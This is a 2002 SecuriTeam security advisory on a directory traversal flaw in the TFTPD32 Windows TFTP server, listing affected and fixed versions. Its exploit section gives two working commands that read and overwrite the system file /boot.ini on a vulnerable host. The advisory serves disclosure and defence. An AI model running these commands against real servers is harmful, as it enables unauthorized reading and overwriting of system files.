SecuriTeam.com ™ (TFTPD32 Directory Traversal Vulnerability)

<SCRIPT language=javascript>document.write('<SCRIPT language=javascript src="http://adserver.matchcraft.com/adserver/jslayer/SecuriTeam/Security!20News!2c!20Tools!20and!20Reviews/468x60"></SCRIPT>'); </SCRIPT> <NOSCRIPT><a ><img src="http://adserver.matchcraft.com/adserver/redirect/MC468x60.gif/SecuriTeam" width="468" height="60"></a> </NOSCRIPT>
Title	17/11/2002
TFTPD32 Directory Traversal Vulnerability
Summary
TFTPD32 is a Freeware TFTP server for windows 9x/NT/XP. It provides an implementation of the TFTPv2 protocol (specified in the RFC 1350). A vulnerability in the product allows remote attackers to view any file on the system as well as write to arbitrary locations.
Details
Vulnerable systems: * TFTP32 version 2.50.2 and prior Immune systems: * TFTP32 version 2.51 Exploit: Getting files: tftp host GET /boot.ini Storing files: tftp host PUT myfile /boot.ini
Additional information
The information has been provided by SecurITeam Experts.